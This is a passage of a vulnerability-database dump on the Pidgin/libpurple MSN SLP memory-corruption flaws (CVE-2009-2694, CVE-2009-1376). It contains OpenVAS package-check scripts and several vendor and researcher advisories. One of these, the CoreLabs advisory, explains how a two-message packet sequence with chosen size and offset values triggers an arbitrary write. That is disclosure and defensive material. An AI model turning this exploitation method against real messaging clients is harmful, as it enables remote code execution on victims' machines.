rpm:\"finch-devel~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple\", rpm:\"libpurple~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-perl\", rpm:\"libpurple-perl~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-tcl\", rpm:\"libpurple-tcl~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-devel\", rpm:\"pidgin-devel~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~1.5.1~4.el3\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:44", "references": [], "pluginID": "136141256231064789", "description": "The remote host is missing updates to pidgin announced in\nadvisory CESA-2009:1218.", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-09-02T00:00:00", "title": "CentOS Security Advisory CESA-2009:1218 (pidgin)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2694"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064789", "id": "OPENVAS:136141256231064789", "sourceData": "#CESA-2009:1218 64789 4\n# $Id: ovcesa2009_1218.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1218 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1218\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1218\nhttps://rhn.redhat.com/errata/RHSA-2009-1218.html\";\ntag_summary = \"The remote host is missing updates to pidgin announced in\nadvisory CESA-2009:1218.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64789\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2694\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Security Advisory CESA-2009:1218 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch-devel\", rpm:\"finch-devel~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple\", rpm:\"libpurple~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-perl\", rpm:\"libpurple-perl~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-tcl\", rpm:\"libpurple-tcl~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-devel\", rpm:\"pidgin-devel~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~1.5.1~4.el3\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:39", "references": [], "pluginID": "64769", "description": "The remote host is missing an update as announced\nvia advisory SSA:2009-231-02.", "edition": 2, "reporter": "Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com", "published": "2012-09-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Slackware Advisory SSA:2009-231-02 pidgin ", "type": "openvas", "naslFamily": "Slackware Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2694"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64769", "id": "OPENVAS:64769", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2009_231_02.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New pidgin packages are available for Slackware 12.0, 12.1, 12.2, and -current\nto fix a security issue.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2009-231-02.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2009-231-02\";\n \nif(description)\n{\n script_id(64769);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2009-2694\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n script_name(\"Slackware Advisory SSA:2009-231-02 pidgin \");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"pidgin\", ver:\"2.5.9-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"pidgin\", ver:\"2.5.9-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"pidgin\", ver:\"2.5.9-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:31", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n\r\nLibpurple msn_slplink_process_msg() Arbitrary Write Vulnerability\r\n\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Libpurple msn_slplink_process_msg() Arbitrary Write Vulnerability\r\nAdvisory ID: CORE-2009-0727\r\nAdvisory URL: http://www.coresecurity.com/content/libpurple-arbitrary-write\r\nDate published: 2009-08-18\r\nDate of last update: 2009-08-18\r\nVendors contacted: Pidgin team\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Memory corruption\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID:\r\nCVE Name: CVE-2009-2694\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nPidgin (formerly named Gaim) is a multi-platform instant messaging\r\nclient, based on a library named libpurple. Libpurple has support for\r\nmany commonly used instant messaging protocols, allowing the user to log\r\ninto various different services from one application.\r\n\r\nA remote arbitrary-code-execution vulnerability has been found in\r\nLibpurple (used by Pidgin and Adium instant messaging clients, among\r\nothers), which can be triggered by a remote attacker by sending a\r\nspecially crafted MSNSLP packet [4] with invalid data to the client\r\nthrough the MSN server. No victim interaction is required, and the\r\nattacker is not required to be in the victim's buddy list (under default\r\nconfiguration).\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . Gaim >= 0.79\r\n . Libpurple <= 2.5.8 (Pidgin <= 2.5.8 and Adium <= 1.3.5)\r\n . Other Libpurple frontends such as Finch might be vulnerable as well.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Libpurple >= 2.6.0 (Pidgin >= 2.6.0)\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nThe default privacy settings allow any remote entity to contact an MSN\r\nuser, so the attacker is not required to be in the victim's buddy list.\r\nThe attack can be mitigated by setting the privacy settings for MSN\r\naccounts to "Allow only the users below" (by default, the list of people\r\non the buddy list).\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Federico Muttis from\r\nCore Security Technologies.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n8.1. *Overview*\r\n\r\nThe flaw exists within the function 'msn_slplink_process_msg()' of\r\nLibpurple <= 2.5.8, which fails to properly validate an offset value\r\nspecified in a MSNSLP packet [4].\r\n\r\nThis affects at least two widely used products: Pidgin <= 2.5.8 [1] and\r\nAdium <= 1.3.5 [2].\r\n\r\nAccording to their website [3], Libpurple is also used by:\r\n\r\n . Apollo IM - IM application for the iPhone and iPod Touch.\r\n . EQO - an IM program for mobile phones.\r\n . Finch - a text-based IM program that works well in Linux and other\r\nUnixes.\r\n . Instantbird - a graphical IM program based on Mozilla's XUL framework.\r\n . Meebo - a web-based IM program.\r\n . Telepathy-Haze - a connection manager for the Telepathy IM framework.\r\n\r\n These programs may also be vulnerable.\r\n\r\nIf the victim has its privacy settings set to "everyone can contact me",\r\nthe victim is not required to be in the attacker's contact list.\r\nOtherwise that is the only requirement for exploitation and no other\r\nvictim interaction is required.\r\n\r\nBy sending a specially crafted packet, an attacker can write an\r\narbitrary address with controlled data, resulting in arbitrary code\r\nexecution.\r\n\r\n\r\n8.2. *Previous patches*\r\n\r\nA similar vulnerability was already reported in CVE-2008-2927 [5] and\r\nCVE-2009-1376 [6]. CVE-2008-2927 added some bounds checking in\r\n'msn_slplink_process_msg()', specifically:\r\n\r\n/-----------\r\n\r\nif (G_MAXSIZE - len < offset || (offset='' + len='') > slpmsg->size)\r\n{\r\n .. discard packet ..\r\n} else {\r\n .. vulnerable memcpy ..\r\n}\r\n\r\n- -----------/\r\n\r\n CVE-2009-1376 demonstrates that this can be exploited. The idea of the\r\npatch for CVE-2009-1376 was to fix a casting error, where an unsigned 64\r\nbits integer was casted to an unsigned 32 bits integer in the following\r\nline:\r\n\r\n/-----------\r\n\r\ndeclaration of offset;\r\n...\r\noffset = msg->msnslp_header.offset;\r\n\r\n- -----------/\r\n\r\n\r\n\r\nThe declaration of offset was changed from 'gsize' to 'guint64' in\r\n2.5.8. This approach is clearly not enough, we found that by providing\r\ndifferent size/offset values, the call to memcpy() can still be reached\r\nwith almost any value. The first PoC we constructed to trigger this\r\nvulnerability was fixed by the patch introduced in Libpurple 2.5.6, but\r\nby working on it a little more, we triggered the bug again in Libpurple\r\n2.5.8. We conclude that the fix was incomplete.\r\n\r\n\r\n8.3. *Exploitation of Libpurple 2.5.8*\r\n\r\nThe attack consists in sending two consecutive MSNSLP messages [4]. The\r\nfirst one is used to store a 'slpmsg' with our session id, and the\r\nsecond one to trigger the vulnerability.\r\n\r\nOur goal is to reach the 'memcpy()' invocation in\r\n'msn_slplink_process_msg()'. We need to construct a MSNSLP message with\r\nan offset different from zero (as this value will be the destination of\r\nthe vulnerable 'memcpy()').\r\n\r\nAs the offset will be different from zero, the first problem arises when\r\na call to 'msn_slplink_message_find()' returns NULL:\r\n\r\n/-----------\r\n\r\nif (offset == 0)\r\n{\r\n .. construct a new slpmsg ..\r\n}\r\nelse\r\n{\r\n slpmsg = msn_slplink_message_find(slplink,\r\nmsg->msnslp_header.session_id, msg->msnslp_header.id);\r\n}\r\n\r\nif (slpmsg == NULL)\r\n{\r\n /* Probably the transfer was canceled */\r\n purple_debug_error("msn", "Couldn't find slpmsg\n");\r\n return;\r\n}\r\n\r\n- -----------/\r\n\r\n So, 'slpmsg' must be different from NULL. And this is exactly why this\r\nis a two-message attack. We need to send a first MSNSLP message, with an\r\noffset equal to zero, that constructs a slpmsg object, so Libpurple will\r\nstore it. The second MSNSLP message will have an offset value different\r\nfrom zero, but as Libpurple stored our first MSNSLP message, the call to\r\n'msn_slplink_message_find()' will effectively return our previous\r\nobject, instead of NULL.\r\n\r\nSo we reach:\r\n\r\n/-----------\r\n\r\nif (slpmsg->fp)\r\n{\r\n /* fseek(slpmsg->fp, offset, SEEK_SET); */\r\n len = fwrite(data, 1, len, slpmsg->fp);\r\n}\r\nelse if (slpmsg->size)\r\n{\r\n if (G_MAXSIZE - len < offset || (offset='' + len='') > slpmsg->size)\r\n {\r\n purple_debug_error("msn",\r\n "Oversized slpmsg - msgsize=%lld offset=%" G_GSIZE_FORMAT "\r\nlen=%" G_GSIZE_FORMAT "\n",\r\n slpmsg->size, offset, len);\r\n g_return_if_reached();\r\n }\r\n else\r\n memcpy(slpmsg->buffer + offset, data, len);\r\n }\r\n\r\n- -----------/\r\n\r\n For example, if we construct our first MSNSLP message with a size of\r\n'0x01ffffff', and the second one (which is being processed and whose\r\noffset is assigned to the offset variable) has an offset of an arbitrary\r\nvalue lower than '0x01ffffff - len', then the conditions for an\r\narbitrary write are met.\r\n\r\nFinally, we reach 'memcpy()' with an offset of any value lower than\r\n'0x01ffffff - len' and the buffer pointing to 0. This means that we can\r\nwrite the contents of data in an arbitrary location lower than\r\n'0x01ffffff - len', which allows arbitrary code execution in almost any\r\nplatform.\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2009-07-28:\r\nCore Security Technologies notifies the Pidgin team of the vulnerability\r\nand schedules a preliminary publication date to August 18th.\r\n\r\n. 2009-07-28:\r\nPidgin team requests technical details (in plaintext or encrypted).\r\n\r\n. 2009-07-30:\r\nCore sends the advisory draft, encrypted, including technical details.\r\n\r\n. 2009-07-30:\r\nPidgin team acknowledges reception of the draft.\r\n\r\n. 2009-07-31:\r\nPidgin team notifies Core that they cannot reproduce the bug.\r\n\r\n. 2009-07-31:\r\nCore sends proof of concept code to the Pidgin team.\r\n\r\n. 2009-08-10:\r\nCore requests the Pidgin team an update on the bug status and fixes.\r\n\r\n. 2009-08-13:\r\nPidgin team confirms Core that fixes will be ready by August 18th, and\r\nsends information regarding affected versions and mitigations.\r\n\r\n. 2009-08-13:\r\nCore acknowledges the information sent by Pidgin team.\r\n\r\n. 2009-08-18:\r\nThe advisory CORE-2009-0727 is published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] Pidgin http://www.pidgin.im/\r\n[2] Adium http://adium.im/\r\n[3] Libpurple http://developer.pidgin.im/wiki/WhatIsLibpurple\r\n[4] MSNSLP http://msnpiki.msnfanatic.com/index.php/MSNC:MSNSLP\r\n[5] CVE-2008-2927\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2927\r\n[6] CVE-2009-1376\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1376\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://www.coresecurity.com/corelabs.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper credit\r\nis given.\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.8 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niEYEARECAAYFAkqLIpwACgkQyNibggitWa2yqgCeJ3qxJluj3aNZzz3Y6XPULeHa\r\nKG8AnRiJXqQ/XX2E0UKb1sQOeWGfJhIc\r\n=GQCO\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2009-08-19T00:00:00", "title": "CORE-2009-0727: Libpurple msn_slplink_process_msg() Arbitrary Write Vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:31", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-2694"], "modified": "2009-08-19T00:00:00", "id": "SECURITYVULNS:DOC:22344", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22344", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:30", "references": [], "description": "ZDI-09-031: Multiple Vendor libpurple MSN Protocol SLP Message Heap Overflow\r\nVulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-09-031\r\nJune 8, 2009\r\n\r\n-- CVE ID:\r\nCVE-2009-1376\r\n\r\n-- Affected Vendors:\r\nAdium\r\nPidgin\r\n\r\n-- Affected Products:\r\nAdium Adiumx\r\nPidgin Pidgin\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nsystems with vulnerable installations of messaging applications that\r\nmake use of the libpurple library. User interaction is not required to\r\nexploit this vulnerability.\r\n\r\nThe specific flaw exists in the implementation of the MSN protocol,\r\nspecifically the handling of SLP messages. The function\r\nmsn_slplink_process_msg() fails to properly validate an offset value\r\nspecified in the SLP packet. By providing a specific value, an attacker\r\ncan overflow a heap buffer resulting in arbitrary code execution.\r\n\r\n-- Vendor Response:\r\nPidgin has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://pidgin.im/news/security/?id=32\r\n\r\n-- Disclosure Timeline:\r\n2009-02-25 - Vulnerability reported to vendor\r\n2009-06-08 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Loc VALBON\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents\r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/", "edition": 1, "reporter": "Securityvulns", "published": "2009-06-09T00:00:00", "title": "ZDI-09-031: libpurple MSN Protocol SLP Message Heap Overflow Vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:30", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2009-1376"], "modified": "2009-06-09T00:00:00", "id": "SECURITYVULNS:DOC:21963", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21963", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:30", "references": ["https://vulners.com/securityvulns/securityvulns:doc:21963", "https://vulners.com/securityvulns/securityvulns:doc:20427"], "description": "Buffer overflow on MSN SLP messages parsing.", "edition": 1, "reporter": "BUGTRAQ", "published": "2009-06-09T00:00:00", "title": "libpurple / Pidgin buffer overflow", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:30", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Pidgin", "version": "2.4", "operator": "eq"}], "cvelist": ["CVE-2008-2927", "CVE-2009-1376"], "modified": "2009-06-09T00:00:00", "id": "SECURITYVULNS:VULN:9250", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9250", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:33", "references": ["https://vulners.com/securityvulns/securityvulns:doc:22344"], "description": "Memory corruption on malformed MSN protocol message.", "edition": 1, "reporter": "BUGTRAQ", "published": "2009-08-19T00:00:00", "title": "Libpurple / Pidgin memory corruption", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:33", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "libpurple", "version": "2.5", "operator": "eq"}, {"name": "Adium", "version": "1.3", "operator": "eq"}, {"name": "Pidgin", "version": "2.5", "operator": "eq"}], "cvelist": ["CVE-2009-3084", "CVE-2009-2694"], "modified": "2009-08-19T00:00:00", "id": "SECURITYVULNS:VULN:10165", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10165", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:31", "references": [], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:230\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : pidgin\r\n Date : September 11, 2009\r\n Affected: 2009.0, 2009.1, Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Security vulnerabilities has been identified and fixed in pidgin:\r\n \r\n The msn_slplink_process_msg function in\r\n libpurple/protocols/msn/slplink.c in libpurple, as used in Pidgin\r\n (formerly Gaim) before 2.5.9 and Adium 1.3.5 and earlier, allows\r\n remote attackers to execute arbitrary code or cause a denial of service\r\n (memory corruption and application crash) by sending multiple crafted\r\n SLP (aka MSNSLP) messages to trigger an overwrite of an arbitrary\r\n memory location. NOTE: this issue reportedly exists because of an\r\n incomplete fix for CVE-2009-1376 (CVE-2009-2694).\r\n \r\n Unspecified vulnerability in Pidgin 2.6.0 allows remote attackers\r\n to cause a denial of service (crash) via a link in a Yahoo IM\r\n (CVE-2009-3025)\r\n \r\n protocols/jabber/auth.c in libpurple in Pidgin 2.6.0, and possibly\r\n other versions, does not follow the require TLS/SSL preference\r\n when connecting to older Jabber servers that do not follow the XMPP\r\n specification, which causes libpurple to connect to the server without\r\n the expected encryption and allows remote attackers to sniff sessions\r\n (CVE-2009-3026).\r\n \r\n libpurple/protocols/irc/msgs.c in the IRC protocol plugin in libpurple\r\n in Pidgin before 2.6.2 allows remote IRC servers to cause a denial\r\n of service (NULL pointer dereference and application crash) via a\r\n TOPIC message that lacks a topic string (CVE-2009-2703).\r\n \r\n The msn_slp_sip_recv function in libpurple/protocols/msn/slp.c in the\r\n MSN protocol plugin in libpurple in Pidgin before 2.6.2 allows remote\r\n attackers to cause a denial of service (NULL pointer dereference\r\n and application crash) via an SLP invite message that lacks certain\r\n required fields, as demonstrated by a malformed message from a KMess\r\n client (CVE-2009-3083).\r\n \r\n The msn_slp_process_msg function in libpurple/protocols/msn/slpcall.c\r\n in the MSN protocol plugin in libpurple 2.6.0 and 2.6.1, as used in\r\n Pidgin before 2.6.2, allows remote attackers to cause a denial of\r\n service (application crash) via a handwritten (aka Ink) message,\r\n related to an uninitialized variable and the incorrect UTF16-LE\r\n charset name (CVE-2009-3084).\r\n \r\n The XMPP protocol plugin in libpurple in Pidgin before 2.6.2 does\r\n not properly handle an error IQ stanza during an attempted fetch of\r\n a custom smiley, which allows remote attackers to cause a denial of\r\n service (application crash) via XHTML-IM content with cid: images\r\n (CVE-2009-3085).\r\n \r\n This update provides pidgin 2.6.2, which is not vulnerable to these\r\n issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n 